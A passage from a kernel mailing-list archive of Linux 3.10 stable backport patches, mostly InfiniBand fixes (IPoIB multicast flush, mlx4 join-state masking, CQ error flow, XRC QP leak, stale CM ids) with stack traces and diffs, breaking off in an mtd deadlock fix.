the BC MGID is present in the multicast list but not found when trying
to detach it because of the previous double attach and single detach.

[18332.714265] ------------[ cut here ]------------
[18332.717775] WARNING: CPU: 6 PID: 3767 at drivers/infiniband/core/verbs.c:280 ib_dealloc_pd+0xff/0x120 [ib_core]
...
[18332.775198] Hardware name: Red Hat KVM, BIOS Bochs 01/01/2011
[18332.779411]  0000000000000000 ffff8800b50dfbb0 ffffffff813fed47 0000000000000000
[18332.784960]  0000000000000000 ffff8800b50dfbf0 ffffffff8109add1 0000011832f58300
[18332.790547]  ffff880226a596c0 ffff880032482000 ffff880032482830 ffff880226a59280
[18332.796199] Call Trace:
[18332.798015]  [<ffffffff813fed47>] dump_stack+0x63/0x8c
[18332.801831]  [<ffffffff8109add1>] __warn+0xd1/0xf0
[18332.805403]  [<ffffffff8109aebd>] warn_slowpath_null+0x1d/0x20
[18332.809706]  [<ffffffffa025d90f>] ib_dealloc_pd+0xff/0x120 [ib_core]
[18332.814384]  [<ffffffffa04f3d7c>] ipoib_transport_dev_cleanup+0xfc/0x1d0 [ib_ipoib]
[18332.820031]  [<ffffffffa04ed648>] ipoib_ib_dev_cleanup+0x98/0x110 [ib_ipoib]
[18332.825220]  [<ffffffffa04e62c8>] ipoib_dev_cleanup+0x2d8/0x550 [ib_ipoib]
[18332.830290]  [<ffffffffa04e656f>] ipoib_uninit+0x2f/0x40 [ib_ipoib]
[18332.834911]  [<ffffffff81772a8a>] rollback_registered_many+0x1aa/0x2c0
[18332.839741]  [<ffffffff81772bd1>] rollback_registered+0x31/0x40
[18332.844091]  [<ffffffff81773b18>] unregister_netdevice_queue+0x48/0x80
[18332.848880]  [<ffffffffa04f489b>] ipoib_vlan_delete+0x1fb/0x290 [ib_ipoib]
[18332.853848]  [<ffffffffa04df1cd>] delete_child+0x7d/0xf0 [ib_ipoib]
[18332.858474]  [<ffffffff81520c08>] dev_attr_store+0x18/0x30
[18332.862510]  [<ffffffff8127fe4a>] sysfs_kf_write+0x3a/0x50
[18332.866349]  [<ffffffff8127f4e0>] kernfs_fop_write+0x120/0x170
[18332.870471]  [<ffffffff81207198>] __vfs_write+0x28/0xe0
[18332.874152]  [<ffffffff810e09bf>] ? percpu_down_read+0x1f/0x50
[18332.878274]  [<ffffffff81208062>] vfs_write+0xa2/0x1a0
[18332.881896]  [<ffffffff812093a6>] SyS_write+0x46/0xa0
[18332.885632]  [<ffffffff810039b7>] do_syscall_64+0x57/0xb0
[18332.889709]  [<ffffffff81883321>] entry_SYSCALL64_slow_path+0x25/0x25
[18332.894727] ---[ end trace 09ebbe31f831ef17 ]---

Fixes: ee1e2c82c245 ("IPoIB: Refresh paths instead of flushing them on SM change events")
Signed-off-by: Alex Vesker <valex@mellanox.com>
Signed-off-by: Leon Romanovsky <leon@kernel.org>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/infiniband/ulp/ipoib/ipoib_ib.c | 9 +++++++++
 1 file changed, 9 insertions(+)

diff --git a/drivers/infiniband/ulp/ipoib/ipoib_ib.c b/drivers/infiniband/ulp/ipoib/ipoib_ib.c
index 2cfa76f..39168d3 100644
--- a/drivers/infiniband/ulp/ipoib/ipoib_ib.c
+++ b/drivers/infiniband/ulp/ipoib/ipoib_ib.c
@@ -979,8 +979,17 @@ static void __ipoib_ib_dev_flush(struct ipoib_dev_priv *priv,
 	}
 
 	if (level == IPOIB_FLUSH_LIGHT) {
+		int oper_up;
 		ipoib_mark_paths_invalid(dev);
+		/* Set IPoIB operation as down to prevent races between:
+		 * the flush flow which leaves MCG and on the fly joins
+		 * which can happen during that time. mcast restart task
+		 * should deal with join requests we missed.
+		 */
+		oper_up = test_and_clear_bit(IPOIB_FLAG_OPER_UP, &priv->flags);
 		ipoib_mcast_dev_flush(dev);
+		if (oper_up)
+			set_bit(IPOIB_FLAG_OPER_UP, &priv->flags);
 	}
 
 	if (level >= IPOIB_FLUSH_NORMAL)
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 203/319] IB/mlx4: Fix incorrect MC join state bit-masking on SR-IOV
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (101 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 202/319] IB/ipoib: Don't allow MC joins during light MC flush Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 204/319] IB/mlx4: Fix create CQ error flow Willy Tarreau
                   ` (115 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Alex Vesker, Leon Romanovsky, Doug Ledford, Willy Tarreau

From: Alex Vesker <valex@mellanox.com>

commit e5ac40cd66c2f3cd11bc5edc658f012661b16347 upstream.

Because of an incorrect bit-masking done on the join state bits, when
handling a join request we failed to detect a difference between the
group join state and the request join state when joining as send only
full member (0x8). This caused the MC join request not to be sent.
This issue is relevant only when SRIOV is enabled and SM supports
send only full member.

This fix separates scope bits and join states bits a nibble each.

Fixes: b9c5d6a64358 ('IB/mlx4: Add multicast group (MCG) paravirtualization for SR-IOV')
Signed-off-by: Alex Vesker <valex@mellanox.com>
Signed-off-by: Leon Romanovsky <leon@kernel.org>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/infiniband/hw/mlx4/mcg.c | 14 +++++++-------
 1 file changed, 7 insertions(+), 7 deletions(-)

diff --git a/drivers/infiniband/hw/mlx4/mcg.c b/drivers/infiniband/hw/mlx4/mcg.c
index 25b2cdf..27bedc3 100644
--- a/drivers/infiniband/hw/mlx4/mcg.c
+++ b/drivers/infiniband/hw/mlx4/mcg.c
@@ -483,7 +483,7 @@ static u8 get_leave_state(struct mcast_group *group)
 		if (!group->members[i])
 			leave_state |= (1 << i);
 
-	return leave_state & (group->rec.scope_join_state & 7);
+	return leave_state & (group->rec.scope_join_state & 0xf);
 }
 
 static int join_group(struct mcast_group *group, int slave, u8 join_mask)
@@ -558,8 +558,8 @@ static void mlx4_ib_mcg_timeout_handler(struct work_struct *work)
 		} else
 			mcg_warn_group(group, "DRIVER BUG\n");
 	} else if (group->state == MCAST_LEAVE_SENT) {
-		if (group->rec.scope_join_state & 7)
-			group->rec.scope_join_state &= 0xf8;
+		if (group->rec.scope_join_state & 0xf)
+			group->rec.scope_join_state &= 0xf0;
 		group->state = MCAST_IDLE;
 		mutex_unlock(&group->lock);
 		if (release_group(group, 1))
@@ -599,7 +599,7 @@ static int handle_leave_req(struct mcast_group *group, u8 leave_mask,
 static int handle_join_req(struct mcast_group *group, u8 join_mask,
 			   struct mcast_req *req)
 {
-	u8 group_join_state = group->rec.scope_join_state & 7;
+	u8 group_join_state = group->rec.scope_join_state & 0xf;
 	int ref = 0;
 	u16 status;
 	struct ib_sa_mcmember_data *sa_data = (struct ib_sa_mcmember_data *)req->sa_mad.data;
@@ -684,8 +684,8 @@ static void mlx4_ib_mcg_work_handler(struct work_struct *work)
 			u8 cur_join_state;
 
 			resp_join_state = ((struct ib_sa_mcmember_data *)
-						group->response_sa_mad.data)->scope_join_state & 7;
-			cur_join_state = group->rec.scope_join_state & 7;
+						group->response_sa_mad.data)->scope_join_state & 0xf;
+			cur_join_state = group->rec.scope_join_state & 0xf;
 
 			if (method == IB_MGMT_METHOD_GET_RESP) {
 				/* successfull join */
@@ -704,7 +704,7 @@ process_requests:
 		req = list_first_entry(&group->pending_list, struct mcast_req,
 				       group_list);
 		sa_data = (struct ib_sa_mcmember_data *)req->sa_mad.data;
-		req_join_state = sa_data->scope_join_state & 0x7;
+		req_join_state = sa_data->scope_join_state & 0xf;
 
 		/* For a leave request, we will immediately answer the VF, and
 		 * update our internal counters. The actual leave will be sent
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 204/319] IB/mlx4: Fix create CQ error flow
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (102 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 203/319] IB/mlx4: Fix incorrect MC join state bit-masking on SR-IOV Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 205/319] IB/uverbs: Fix leak of XRC target QPs Willy Tarreau
                   ` (114 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Matan Barak, Daniel Jurgens, Leon Romanovsky, Doug Ledford,
	Willy Tarreau

From: Matan Barak <matanb@mellanox.com>

commit 593ff73bcfdc79f79a8a0df55504f75ad3e5d1a9 upstream.

Currently, if ib_copy_to_udata fails, the CQ
won't be deleted from the radix tree and the HW (HW2SW).

Fixes: 225c7b1feef1 ('IB/mlx4: Add a driver Mellanox ConnectX InfiniBand adapters')
Signed-off-by: Matan Barak <matanb@mellanox.com>
Signed-off-by: Daniel Jurgens <danielj@mellanox.com>
Reviewed-by: Mark Bloch <markb@mellanox.com>
Signed-off-by: Leon Romanovsky <leon@kernel.org>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/infiniband/hw/mlx4/cq.c | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/drivers/infiniband/hw/mlx4/cq.c b/drivers/infiniband/hw/mlx4/cq.c
index d5e60f4..5b8a62c 100644
--- a/drivers/infiniband/hw/mlx4/cq.c
+++ b/drivers/infiniband/hw/mlx4/cq.c
@@ -239,11 +239,14 @@ struct ib_cq *mlx4_ib_create_cq(struct ib_device *ibdev, int entries, int vector
 	if (context)
 		if (ib_copy_to_udata(udata, &cq->mcq.cqn, sizeof (__u32))) {
 			err = -EFAULT;
-			goto err_dbmap;
+			goto err_cq_free;
 		}
 
 	return &cq->ibcq;
 
+err_cq_free:
+	mlx4_cq_free(dev->dev, &cq->mcq);
+
 err_dbmap:
 	if (context)
 		mlx4_ib_db_unmap_user(to_mucontext(context), &cq->db);
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 205/319] IB/uverbs: Fix leak of XRC target QPs
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (103 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 204/319] IB/mlx4: Fix create CQ error flow Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 206/319] IB/cm: Mark stale CM id's whenever the mad agent was unregistered Willy Tarreau
                   ` (113 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Tariq Toukan, Noa Osherovich, Leon Romanovsky, Doug Ledford,
	Willy Tarreau

From: Tariq Toukan <tariqt@mellanox.com>

commit 5b810a242c28e1d8d64d718cebe75b79d86a0b2d upstream.

The real QP is destroyed in case of the ref count reaches zero, but
for XRC target QPs this call was missed and caused to QP leaks.

Let's call to destroy for all flows.

Fixes: 0e0ec7e0638e ('RDMA/core: Export ib_open_qp() to share XRC...')
Signed-off-by: Tariq Toukan <tariqt@mellanox.com>
Signed-off-by: Noa Osherovich <noaos@mellanox.com>
Signed-off-by: Leon Romanovsky <leon@kernel.org>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/infiniband/core/uverbs_main.c | 7 ++-----
 1 file changed, 2 insertions(+), 5 deletions(-)

diff --git a/drivers/infiniband/core/uverbs_main.c b/drivers/infiniband/core/uverbs_main.c
index f50623d..37b7207 100644
--- a/drivers/infiniband/core/uverbs_main.c
+++ b/drivers/infiniband/core/uverbs_main.c
@@ -224,12 +224,9 @@ static int ib_uverbs_cleanup_ucontext(struct ib_uverbs_file *file,
 			container_of(uobj, struct ib_uqp_object, uevent.uobject);
 
 		idr_remove_uobj(&ib_uverbs_qp_idr, uobj);
-		if (qp != qp->real_qp) {
-			ib_close_qp(qp);
-		} else {
+		if (qp == qp->real_qp)
 			ib_uverbs_detach_umcast(qp, uqp);
-			ib_destroy_qp(qp);
-		}
+		ib_destroy_qp(qp);
 		ib_uverbs_release_uevent(file, &uqp->uevent);
 		kfree(uqp);
 	}
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 206/319] IB/cm: Mark stale CM id's whenever the mad agent was unregistered
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (104 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 205/319] IB/uverbs: Fix leak of XRC target QPs Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 207/319] mtd: blkdevs: fix potential deadlock + lockdep warnings Willy Tarreau
                   ` (112 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Mark Bloch, Erez Shitrit, Leon Romanovsky, Doug Ledford, Willy Tarreau

From: Mark Bloch <markb@mellanox.com>

commit 9db0ff53cb9b43ed75bacd42a89c1a0ab048b2b0 upstream.

When there is a CM id object that has port assigned to it, it means that
the cm-id asked for the specific port that it should go by it, but if
that port was removed (hot-unplug event) the cm-id was not updated.
In order to fix that the port keeps a list of all the cm-id's that are
planning to go by it, whenever the port is removed it marks all of them
as invalid.

This commit fixes a kernel panic which happens when running traffic between
guests and we force reboot a guest mid traffic, it triggers a kernel panic:

 Call Trace:
  [<ffffffff815271fa>] ? panic+0xa7/0x16f
  [<ffffffff8152b534>] ? oops_end+0xe4/0x100
  [<ffffffff8104a00b>] ? no_context+0xfb/0x260
  [<ffffffff81084db2>] ? del_timer_sync+0x22/0x30
  [<ffffffff8104a295>] ? __bad_area_nosemaphore+0x125/0x1e0
  [<ffffffff81084240>] ? process_timeout+0x0/0x10
  [<ffffffff8104a363>] ? bad_area_nosemaphore+0x13/0x20
  [<ffffffff8104aabf>] ? __do_page_fault+0x31f/0x480
  [<ffffffff81065df0>] ? default_wake_function+0x0/0x20
  [<ffffffffa0752675>] ? free_msg+0x55/0x70 [mlx5_core]
  [<ffffffffa0753434>] ? cmd_exec+0x124/0x840 [mlx5_core]
  [<ffffffff8105a924>] ? find_busiest_group+0x244/0x9f0
  [<ffffffff8152d45e>] ? do_page_fault+0x3e/0xa0
  [<ffffffff8152a815>] ? page_fault+0x25/0x30
  [<ffffffffa024da25>] ? cm_alloc_msg+0x35/0xc0 [ib_cm]
  [<ffffffffa024e821>] ? ib_send_cm_dreq+0xb1/0x1e0 [ib_cm]
  [<ffffffffa024f836>] ? cm_destroy_id+0x176/0x320 [ib_cm]
  [<ffffffffa024fb00>] ? ib_destroy_cm_id+0x10/0x20 [ib_cm]
  [<ffffffffa034f527>] ? ipoib_cm_free_rx_reap_list+0xa7/0x110 [ib_ipoib]
  [<ffffffffa034f590>] ? ipoib_cm_rx_reap+0x0/0x20 [ib_ipoib]
  [<ffffffffa034f5a5>] ? ipoib_cm_rx_reap+0x15/0x20 [ib_ipoib]
  [<ffffffff81094d20>] ? worker_thread+0x170/0x2a0
  [<ffffffff8109b2a0>] ? autoremove_wake_function+0x0/0x40
  [<ffffffff81094bb0>] ? worker_thread+0x0/0x2a0
  [<ffffffff8109aef6>] ? kthread+0x96/0xa0
  [<ffffffff8100c20a>] ? child_rip+0xa/0x20
  [<ffffffff8109ae60>] ? kthread+0x0/0xa0
  [<ffffffff8100c200>] ? child_rip+0x0/0x20

Fixes: a977049dacde ("[PATCH] IB: Add the kernel CM implementation")
Signed-off-by: Mark Bloch <markb@mellanox.com>
Signed-off-by: Erez Shitrit <erezsh@mellanox.com>
Reviewed-by: Maor Gottlieb <maorg@mellanox.com>
Signed-off-by: Leon Romanovsky <leon@kernel.org>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/infiniband/core/cm.c | 127 +++++++++++++++++++++++++++++++++++++------
 1 file changed, 111 insertions(+), 16 deletions(-)

diff --git a/drivers/infiniband/core/cm.c b/drivers/infiniband/core/cm.c
index c410217..951a4f6 100644
--- a/drivers/infiniband/core/cm.c
+++ b/drivers/infiniband/core/cm.c
@@ -79,6 +79,8 @@ static struct ib_cm {
 	__be32 random_id_operand;
 	struct list_head timewait_list;
 	struct workqueue_struct *wq;
+	/* Sync on cm change port state */
+	spinlock_t state_lock;
 } cm;
 
 /* Counter indexes ordered by attribute ID */
@@ -160,6 +162,8 @@ struct cm_port {
 	struct ib_mad_agent *mad_agent;
 	struct kobject port_obj;
 	u8 port_num;
+	struct list_head cm_priv_prim_list;
+	struct list_head cm_priv_altr_list;
 	struct cm_counter_group counter_group[CM_COUNTER_GROUPS];
 };
 
@@ -237,6 +241,12 @@ struct cm_id_private {
 	u8 service_timeout;
 	u8 target_ack_delay;
 
+	struct list_head prim_list;
+	struct list_head altr_list;
+	/* Indicates that the send port mad is registered and av is set */
+	int prim_send_port_not_ready;
+	int altr_send_port_not_ready;
+
 	struct list_head work_list;
 	atomic_t work_count;
 };
@@ -255,19 +265,46 @@ static int cm_alloc_msg(struct cm_id_private *cm_id_priv,
 	struct ib_mad_agent *mad_agent;
 	struct ib_mad_send_buf *m;
 	struct ib_ah *ah;
+	struct cm_av *av;
+	unsigned long flags, flags2;
+	int ret = 0;
 
+	/* don't let the port to be released till the agent is down */
+	spin_lock_irqsave(&cm.state_lock, flags2);
+	spin_lock_irqsave(&cm.lock, flags);
+	if (!cm_id_priv->prim_send_port_not_ready)
+		av = &cm_id_priv->av;
+	else if (!cm_id_priv->altr_send_port_not_ready &&
+		 (cm_id_priv->alt_av.port))
+		av = &cm_id_priv->alt_av;
+	else {
+		pr_info("%s: not valid CM id\n", __func__);
+		ret = -ENODEV;
+		spin_unlock_irqrestore(&cm.lock, flags);
+		goto out;
+	}
+	spin_unlock_irqrestore(&cm.lock, flags);
+	/* Make sure the port haven't released the mad yet */
 	mad_agent = cm_id_priv->av.port->mad_agent;
-	ah = ib_create_ah(mad_agent->qp->pd, &cm_id_priv->av.ah_attr);
-	if (IS_ERR(ah))
-		return PTR_ERR(ah);
+	if (!mad_agent) {
+		pr_info("%s: not a valid MAD agent\n", __func__);
+		ret = -ENODEV;
+		goto out;
+	}
+	ah = ib_create_ah(mad_agent->qp->pd, &av->ah_attr);
+	if (IS_ERR(ah)) {
+		ret = PTR_ERR(ah);
+		goto out;
+	}
 
 	m = ib_create_send_mad(mad_agent, cm_id_priv->id.remote_cm_qpn,
-			       cm_id_priv->av.pkey_index,
+			       av->pkey_index,
 			       0, IB_MGMT_MAD_HDR, IB_MGMT_MAD_DATA,
 			       GFP_ATOMIC);
 	if (IS_ERR(m)) {
 		ib_destroy_ah(ah);
-		return PTR_ERR(m);
+		ret = PTR_ERR(m);
+		goto out;
 	}
 
 	/* Timeout set by caller if response is expected. */
@@ -277,7 +314,10 @@ static int cm_alloc_msg(struct cm_id_private *cm_id_priv,
 	atomic_inc(&cm_id_priv->refcount);
 	m->context[0] = cm_id_priv;
 	*msg = m;
-	return 0;
+
+out:
+	spin_unlock_irqrestore(&cm.state_lock, flags2);
+	return ret;
 }
 
 static int cm_alloc_response_msg(struct cm_port *port,
@@ -346,7 +386,8 @@ static void cm_init_av_for_response(struct cm_port *port, struct ib_wc *wc,
 			   grh, &av->ah_attr);
 }
 
-static int cm_init_av_by_path(struct ib_sa_path_rec *path, struct cm_av *av)
+static int cm_init_av_by_path(struct ib_sa_path_rec *path, struct cm_av *av,
+			      struct cm_id_private *cm_id_priv)
 {
 	struct cm_device *cm_dev;
 	struct cm_port *port = NULL;
@@ -376,7 +417,18 @@ static int cm_init_av_by_path(struct ib_sa_path_rec *path, struct cm_av *av)
 	ib_init_ah_from_path(cm_dev->ib_device, port->port_num, path,
 			     &av->ah_attr);
 	av->timeout = path->packet_life_time + 1;
-	return 0;
+
+	spin_lock_irqsave(&cm.lock, flags);
+	if (&cm_id_priv->av == av)
+		list_add_tail(&cm_id_priv->prim_list, &port->cm_priv_prim_list);
+	else if (&cm_id_priv->alt_av == av)
+		list_add_tail(&cm_id_priv->altr_list, &port->cm_priv_altr_list);
+	else
+		ret = -EINVAL;
+
+	spin_unlock_irqrestore(&cm.lock, flags);
+
+	return ret;
 }
 
 static int cm_alloc_id(struct cm_id_private *cm_id_priv)
@@ -716,6 +768,8 @@ struct ib_cm_id *ib_create_cm_id(struct ib_device *device,
 	spin_lock_init(&cm_id_priv->lock);
 	init_completion(&cm_id_priv->comp);
 	INIT_LIST_HEAD(&cm_id_priv->work_list);
+	INIT_LIST_HEAD(&cm_id_priv->prim_list);
+	INIT_LIST_HEAD(&cm_id_priv->altr_list);
 	atomic_set(&cm_id_priv->work_count, -1);
 	atomic_set(&cm_id_priv->refcount, 1);
 	return &cm_id_priv->id;
@@ -914,6 +968,15 @@ retest:
 		break;
 	}
 
+	spin_lock_irq(&cm.lock);
+	if (!list_empty(&cm_id_priv->altr_list) &&
+	    (!cm_id_priv->altr_send_port_not_ready))
+		list_del(&cm_id_priv->altr_list);
+	if (!list_empty(&cm_id_priv->prim_list) &&
+	    (!cm_id_priv->prim_send_port_not_ready))
+		list_del(&cm_id_priv->prim_list);
+	spin_unlock_irq(&cm.lock);
+
 	cm_free_id(cm_id->local_id);
 	cm_deref_id(cm_id_priv);
 	wait_for_completion(&cm_id_priv->comp);
@@ -1137,12 +1200,13 @@ int ib_send_cm_req(struct ib_cm_id *cm_id,
 		goto out;
 	}
 
-	ret = cm_init_av_by_path(param->primary_path, &cm_id_priv->av);
+	ret = cm_init_av_by_path(param->primary_path, &cm_id_priv->av,
+				 cm_id_priv);
 	if (ret)
 		goto error1;
 	if (param->alternate_path) {
 		ret = cm_init_av_by_path(param->alternate_path,
-					 &cm_id_priv->alt_av);
+					 &cm_id_priv->alt_av, cm_id_priv);
 		if (ret)
 			goto error1;
 	}
@@ -1562,7 +1626,8 @@ static int cm_req_handler(struct cm_work *work)
 
 	cm_process_routed_req(req_msg, work->mad_recv_wc->wc);
 	cm_format_paths_from_req(req_msg, &work->path[0], &work->path[1]);
-	ret = cm_init_av_by_path(&work->path[0], &cm_id_priv->av);
+	ret = cm_init_av_by_path(&work->path[0], &cm_id_priv->av,
+				 cm_id_priv);
 	if (ret) {
 		ib_get_cached_gid(work->port->cm_dev->ib_device,
 				  work->port->port_num, 0, &work->path[0].sgid);
@@ -1572,7 +1637,8 @@ static int cm_req_handler(struct cm_work *work)
 		goto rejected;
 	}
 	if (req_msg->alt_local_lid) {
-		ret = cm_init_av_by_path(&work->path[1], &cm_id_priv->alt_av);
+		ret = cm_init_av_by_path(&work->path[1], &cm_id_priv->alt_av,
+					 cm_id_priv);
 		if (ret) {
 			ib_send_cm_rej(cm_id, IB_CM_REJ_INVALID_ALT_GID,
 				       &work->path[0].sgid,
@@ -2627,7 +2693,8 @@ int ib_send_cm_lap(struct ib_cm_id *cm_id,
 		goto out;
 	}
 
-	ret = cm_init_av_by_path(alternate_path, &cm_id_priv->alt_av);
+	ret = cm_init_av_by_path(alternate_path, &cm_id_priv->alt_av,
+				 cm_id_priv);
 	if (ret)
 		goto out;
 	cm_id_priv->alt_av.timeout =
@@ -2739,7 +2806,8 @@ static int cm_lap_handler(struct cm_work *work)
 	cm_init_av_for_response(work->port, work->mad_recv_wc->wc,
 				work->mad_recv_wc->recv_buf.grh,
 				&cm_id_priv->av);
-	cm_init_av_by_path(param->alternate_path, &cm_id_priv->alt_av);
+	cm_init_av_by_path(param->alternate_path, &cm_id_priv->alt_av,
+			   cm_id_priv);
 	ret = atomic_inc_and_test(&cm_id_priv->work_count);
 	if (!ret)
 		list_add_tail(&work->list, &cm_id_priv->work_list);
@@ -2931,7 +2999,7 @@ int ib_send_cm_sidr_req(struct ib_cm_id *cm_id,
 		return -EINVAL;
 
 	cm_id_priv = container_of(cm_id, struct cm_id_private, id);
-	ret = cm_init_av_by_path(param->path, &cm_id_priv->av);
+	ret = cm_init_av_by_path(param->path, &cm_id_priv->av, cm_id_priv);
 	if (ret)
 		goto out;
 
@@ -3352,7 +3420,9 @@ out:
 static int cm_migrate(struct ib_cm_id *cm_id)
 {
 	struct cm_id_private *cm_id_priv;
+	struct cm_av tmp_av;
 	unsigned long flags;
+	int tmp_send_port_not_ready;
 	int ret = 0;
 
 	cm_id_priv = container_of(cm_id, struct cm_id_private, id);
@@ -3361,7 +3431,14 @@ static int cm_migrate(struct ib_cm_id *cm_id)
 	    (cm_id->lap_state == IB_CM_LAP_UNINIT ||
 	     cm_id->lap_state == IB_CM_LAP_IDLE)) {
 		cm_id->lap_state = IB_CM_LAP_IDLE;
+		/* Swap address vector */
+		tmp_av = cm_id_priv->av;
 		cm_id_priv->av = cm_id_priv->alt_av;
+		cm_id_priv->alt_av = tmp_av;
+		/* Swap port send ready state */
+		tmp_send_port_not_ready = cm_id_priv->prim_send_port_not_ready;
+		cm_id_priv->prim_send_port_not_ready = cm_id_priv->altr_send_port_not_ready;
+		cm_id_priv->altr_send_port_not_ready = tmp_send_port_not_ready;
 	} else
 		ret = -EINVAL;
 	spin_unlock_irqrestore(&cm_id_priv->lock, flags);
@@ -3767,6 +3844,9 @@ static void cm_add_one(struct ib_device *ib_device)
 		port->cm_dev = cm_dev;
 		port->port_num = i;
 
+		INIT_LIST_HEAD(&port->cm_priv_prim_list);
+		INIT_LIST_HEAD(&port->cm_priv_altr_list);
+
 		ret = cm_create_port_fs(port);
 		if (ret)
 			goto error1;
@@ -3813,6 +3893,8 @@ static void cm_remove_one(struct ib_device *ib_device)
 {
 	struct cm_device *cm_dev;
 	struct cm_port *port;
+	struct cm_id_private *cm_id_priv;
+	struct ib_mad_agent *cur_mad_agent;
 	struct ib_port_modify port_modify = {
 		.clr_port_cap_mask = IB_PORT_CM_SUP
 	};
@@ -3830,10 +3912,22 @@ static void cm_remove_one(struct ib_device *ib_device)
 	for (i = 1; i <= ib_device->phys_port_cnt; i++) {
 		port = cm_dev->port[i-1];
 		ib_modify_port(ib_device, port->port_num, 0, &port_modify);
-		ib_unregister_mad_agent(port->mad_agent);
+		/* Mark all the cm_id's as not valid */
+		spin_lock_irq(&cm.lock);
+		list_for_each_entry(cm_id_priv, &port->cm_priv_altr_list, altr_list)
+			cm_id_priv->altr_send_port_not_ready = 1;
+		list_for_each_entry(cm_id_priv, &port->cm_priv_prim_list, prim_list)
+			cm_id_priv->prim_send_port_not_ready = 1;
+		spin_unlock_irq(&cm.lock);
 		flush_workqueue(cm.wq);
+		spin_lock_irq(&cm.state_lock);
+		cur_mad_agent = port->mad_agent;
+		port->mad_agent = NULL;
+		spin_unlock_irq(&cm.state_lock);
+		ib_unregister_mad_agent(cur_mad_agent);
 		cm_remove_port_fs(port);
 	}
+
 	device_unregister(cm_dev->device);
 	kfree(cm_dev);
 }
@@ -3846,6 +3940,7 @@ static int __init ib_cm_init(void)
 	INIT_LIST_HEAD(&cm.device_list);
 	rwlock_init(&cm.device_lock);
 	spin_lock_init(&cm.lock);
+	spin_lock_init(&cm.state_lock);
 	cm.listen_service_table = RB_ROOT;
 	cm.listen_service_id = be64_to_cpu(IB_CM_ASSIGN_SERVICE_ID);
 	cm.remote_id_table = RB_ROOT;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 207/319] mtd: blkdevs: fix potential deadlock + lockdep warnings
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (105 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 206/319] IB/cm: Mark stale CM id's whenever the mad agent was unregistered Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 208/319] mtd: pmcmsp-flash: Allocating too much in init_msp_flash() Willy Tarreau
                   ` (111 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Brian Norris, Willy Tarreau

From: Brian Norris <computersforpeace@gmail.com>

commit f3c63795e90f0c6238306883b6c72f14d5355721 upstream.

Commit 073db4a51ee4 ("mtd: fix: avoid race condition when accessing
mtd->usecount") fixed a race condition but due to poor ordering of the
mutex acquisition, introduced a potential deadlock.

The deadlock can occur, for example, when rmmod'ing the m25p80 module, which
will delete one or more MTDs, along with any corresponding mtdblock
devices. This could potentially race with an acquisition of the block
device as follows.

 -> blktrans_open()
    ->  mutex_lock(&dev->lock);
    ->  mutex_lock(&mtd_table_mutex);

 -> del_mtd_device()
    ->  mutex_lock(&mtd_table_mutex);
    ->  blktrans_notify_remove() -> del_mtd_blktrans_dev()
       ->  mutex_lock(&dev->lock);

This is a classic (potential) ABBA deadlock, which can be fixed by
making the A->B ordering consistent everywhere. There was no real
purpose to the ordering in the original patch, AFAIR, so this shouldn't
be a problem. This ordering was actually already present in
del_mtd_blktrans_dev(), for one, where the function tried to ensure that
its caller already held mtd_table_mutex before it acquired &dev->lock:

